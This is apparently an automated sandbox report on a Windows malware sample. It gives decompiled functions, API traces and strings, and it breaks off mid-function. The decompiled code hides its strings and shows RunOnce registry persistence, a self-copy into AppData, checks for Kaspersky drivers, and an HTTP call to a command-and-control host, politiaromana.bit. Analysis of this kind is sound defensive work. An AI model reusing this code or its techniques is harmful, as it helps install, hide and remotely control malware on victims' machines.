										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfbc2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xfbc2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0FBB7D70( &_a136);
				return _t44;
			}

APIs

lstrcpyW.KERNEL32 ref: 0FBB43E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB43E9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FBB4555
wsprintfW.USER32 ref: 0FBB456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0FBB4586

Strings

/, xrefs: 0FBB4475
a, xrefs: 0FBB4515
w, xrefs: 0FBB44F5
l, xrefs: 0FBB44FD
n, xrefs: 0FBB453D
t, xrefs: 0FBB4465
m, xrefs: 0FBB452D
j, xrefs: 0FBB44A5
r, xrefs: 0FBB449D
/, xrefs: 0FBB44C5
h, xrefs: 0FBB4525
y, xrefs: 0FBB451D
h, xrefs: 0FBB445D
-, xrefs: 0FBB450D
w, xrefs: 0FBB447D
d, xrefs: 0FBB44ED
r, xrefs: 0FBB44BD
c, xrefs: 0FBB44AD
., xrefs: 0FBB4535
s, xrefs: 0FBB446D
a, xrefs: 0FBB4505
o, xrefs: 0FBB44DD
{USERID}, xrefs: 0FBB43BF, 0FBB440D, 0FBB4413
d, xrefs: 0FBB44E5
o, xrefs: 0FBB44CD
r, xrefs: 0FBB4495
., xrefs: 0FBB44B5
w, xrefs: 0FBB4485
n, xrefs: 0FBB44D5
t, xrefs: 0FBB448D

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 3e2d6cb91dabadf1d776439bd9073a1d7b62a1e16c45b04ddbac12bbcb038c88
Instruction ID: 4d29933f6cad487dcde5f5ae37d28c719f6bf5dd61d583c269b3486a5a6ccff7
Opcode Fuzzy Hash: 3e2d6cb91dabadf1d776439bd9073a1d7b62a1e16c45b04ddbac12bbcb038c88
Instruction Fuzzy Hash: 53417D70508340CBD720DF15E4583BABFE2FB81759F44495CE6880B292DBFA8599CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0FBB2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FBB82B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0FBB299D

Part of subcall function 0FBB82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
Part of subcall function 0FBB82B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FBB82FB
Part of subcall function 0FBB82B0: GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
Part of subcall function 0FBB82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
Part of subcall function 0FBB82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
Part of subcall function 0FBB82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
Part of subcall function 0FBB82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3

RegCreateKeyExW.KERNELBASE(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FBB2C45,00000000), ref: 0FBB2A84
lstrlenW.KERNEL32(00000000), ref: 0FBB2A8F
RegSetValueExW.KERNELBASE(0FBB2C45,00520050,00000000,00000001,00000000,00000000), ref: 0FBB2AA4
RegCloseKey.KERNELBASE(0FBB2C45), ref: 0FBB2AB1

Strings

i, xrefs: 0FBB29F8
i, xrefs: 0FBB2A5A
n, xrefs: 0FBB2A45
F, xrefs: 0FBB29BD
u, xrefs: 0FBB2A37
f, xrefs: 0FBB2A0D
S, xrefs: 0FBB29B0
s, xrefs: 0FBB2A06
H, xrefs: 0FBB2993
R, xrefs: 0FBB2A68
n, xrefs: 0FBB2A61
d, xrefs: 0FBB2A22
e, xrefs: 0FBB2A7D
r, xrefs: 0FBB2A3E
I, xrefs: 0FBB2979
R, xrefs: 0FBB29CE
P, xrefs: 0FBB296D
A, xrefs: 0FBB298C
r, xrefs: 0FBB29FF
\, xrefs: 0FBB2A30
\, xrefs: 0FBB2A14
i, xrefs: 0FBB2A1B
r, xrefs: 0FBB2A53
w, xrefs: 0FBB2A29
\, xrefs: 0FBB29EB
U, xrefs: 0FBB2984
n, xrefs: 0FBB2A6F
W, xrefs: 0FBB29C7
V, xrefs: 0FBB2A4C
n, xrefs: 0FBB2A76

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 1535ad72f408bfc99527d6c53653d28cfc4981db059ce144a68f6136ae644965
Instruction ID: 39bf694a767c61546e5a15ecc4fa3786c072fd636ecb4f029dd2c8adde328037
Opcode Fuzzy Hash: 1535ad72f408bfc99527d6c53653d28cfc4981db059ce144a68f6136ae644965
Instruction Fuzzy Hash: 9531DAB0D0021DDEEB20CF91E948BEDBFB9FB01709F508159D9187A281D7FA49498F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0FBB2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0FBB2F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FBB2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FBB2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0FBB2F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0FBB2F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0FBB30A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0FBB2AD0(); // executed
				goto L5;
			}

APIs

Part of subcall function 0FBB2F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FBB2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FBB2E19
LoadCursorW.USER32(00000000,00007F00), ref: 0FBB2E2E
LoadIconW.USER32 ref: 0FBB2E59
RegisterClassExW.USER32 ref: 0FBB2E68
ExitThread.KERNEL32 ref: 0FBB2E75

Part of subcall function 0FBB2F50: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0FBB2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2E81
CreateWindowExW.USER32 ref: 0FBB2EA7
SetWindowLongW.USER32 ref: 0FBB2EB4
ExitThread.KERNEL32 ref: 0FBB2EBF

Part of subcall function 0FBB2F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FBB2FA8
Part of subcall function 0FBB2F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FBB2FCF
Part of subcall function 0FBB2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FBB2FE3
Part of subcall function 0FBB2F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB2FFA

ExitThread.KERNEL32 ref: 0FBB2F3F

Part of subcall function 0FBB2AD0: VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0FBB2AEA
Part of subcall function 0FBB2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB2B2C
Part of subcall function 0FBB2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBB2B38
Part of subcall function 0FBB2AD0: ExitThread.KERNEL32 ref: 0FBB2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FBB2EC8
UpdateWindow.USER32(00000000), ref: 0FBB2ECF
CreateThread.KERNEL32 ref: 0FBB2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBB2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBB2F05
TranslateMessage.USER32(?), ref: 0FBB2F1C
DispatchMessageW.USER32 ref: 0FBB2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBB2F37

Strings

s, xrefs: 0FBB2DB9
k, xrefs: 0FBB2D67
0, xrefs: 0FBB2DF1
s, xrefs: 0FBB2D7F
f, xrefs: 0FBB2DA1
w, xrefs: 0FBB2DB1
1, xrefs: 0FBB2D6F
d, xrefs: 0FBB2DA9
s, xrefs: 0FBB2D77
s, xrefs: 0FBB2DC1
firefox, xrefs: 0FBB2E9B
win32app, xrefs: 0FBB2E51, 0FBB2EA0

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 2557d329064742ac55e5b53c09d2cfe815079a4f9f5d0077d409ef6dad4f823d
Instruction ID: 3dabd42c3efed921e7003f5a29bbe7561b09f903e6b485cb487c56e80ac0527c
Opcode Fuzzy Hash: 2557d329064742ac55e5b53c09d2cfe815079a4f9f5d0077d409ef6dad4f823d
Instruction Fuzzy Hash: 88517F70548301AEE3119F62DC09BAB7AE8EF45B56F10441CFA44AB1C1D7F8A106CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB8050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB8050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FBB7E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

APIs

InternetCloseHandle.WININET(?), ref: 0FBB8063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBB8082
VirtualAlloc.KERNELBASE(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FBB7046,ipv4bot.whatismyipaddress.com,0FBBFF90), ref: 0FBB80AF
wsprintfW.USER32 ref: 0FBB80C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FBB80E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FBB814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0FBB8165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FBB8184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FBB81B0
GetLastError.KERNEL32 ref: 0FBB81BC
InternetCloseHandle.WININET(00000000), ref: 0FBB81C9
InternetCloseHandle.WININET(00000000), ref: 0FBB81CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB7046), ref: 0FBB81DA

Strings

a, xrefs: 0FBB8132
b, xrefs: 0FBB8140
H, xrefs: 0FBB80F8
o, xrefs: 0FBB812B
:, xrefs: 0FBB8108
p, xrefs: 0FBB810F
a, xrefs: 0FBB8124
t, xrefs: 0FBB8147
a, xrefs: 0FBB8139
s, xrefs: 0FBB8101
t, xrefs: 0FBB811D
HTTP/1.1, xrefs: 0FBB80D7
l, xrefs: 0FBB8116

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 2419aca9244801561d2b20932307f57e5bebbaadc6ce64357d5f21a971b64f1e
Instruction ID: 7ce076a30d1fec4ea712256e79fb9a48757cb1a52799fc1dcd7474394af4f5c6
Opcode Fuzzy Hash: 2419aca9244801561d2b20932307f57e5bebbaadc6ce64357d5f21a971b64f1e
Instruction Fuzzy Hash: 51416E30A00209ABEB108F56DC48FEEBFBDEF05B55F104159F904AA291C7F59952CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0FBB2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FBB81F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FBB82B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FBB81F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FBB2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FBB2960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0FBB2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBB2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FBB2B7D

Part of subcall function 0FBB82B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
Part of subcall function 0FBB82B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0FBB82FB
Part of subcall function 0FBB82B0: GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
Part of subcall function 0FBB82B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
Part of subcall function 0FBB82B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
Part of subcall function 0FBB82B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
Part of subcall function 0FBB82B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FBB2B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FBB2BE4
lstrcatW.KERNEL32(00000000,?), ref: 0FBB2BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0FBB2BF4
wsprintfW.USER32 ref: 0FBB2C35
ExitThread.KERNEL32 ref: 0FBB2C47

Strings

U, xrefs: 0FBB2B75
I, xrefs: 0FBB2B6C
P, xrefs: 0FBB2B55
"%s", xrefs: 0FBB2C2F
\Microsoft\, xrefs: 0FBB2BDE
AppData, xrefs: 0FBB2B97
.exe, xrefs: 0FBB2BEE

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 3da6aa60238ca1a81f91ec9f4e982db4116a74605a482806dbda5aedf406c2d2
Instruction ID: b9aff3555efc227f86635e2474e0d902133cdfb0abf2f4f6877c6c2ce492ea94
Opcode Fuzzy Hash: 3da6aa60238ca1a81f91ec9f4e982db4116a74605a482806dbda5aedf406c2d2
Instruction Fuzzy Hash: F841C171604300ABE305EF21EC49BBB7A9DAF84711F00046CB94597282DEF8D90ACFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7B70 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0FBB7B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
